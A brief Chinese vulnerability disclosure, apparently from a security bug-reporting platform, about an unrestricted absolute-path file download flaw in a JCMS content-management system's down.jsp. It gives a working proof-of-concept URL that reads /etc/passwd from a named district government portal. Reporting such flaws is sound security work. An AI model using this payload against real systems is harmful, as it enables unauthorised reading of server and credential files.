### 简要描述:
绝对路径文件下载的问题。
### 详细说明:
通过分析代码,某个下载功能没有限制权限,没有限制下载类型,通过设置绝对路径的参数,直接下载。
漏洞利用:
jcms\m_1_9\user\down.jsp?abspathfile=/etc/passwd
### 漏洞证明:
测试代码:
http://www.njgl.gov.cn/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
鼓楼区政府门户网站:
[<img src="https://images.seebug.org/upload/201403/28134323779eab8b1e748370173174ac8fd96ee2.jpg" alt="QQ截图20140328133602.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/28134323779eab8b1e748370173174ac8fd96ee2.jpg)
下载文件内容:
[<img src="https://images.seebug.org/upload/201403/28134335862ee3b661d36cfb601a1a69bec36f91.jpg" alt="QQ截图20140328133642.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/28134335862ee3b661d36cfb601a1a69bec36f91.jpg)
京公网安备 11010502034610号
暂无评论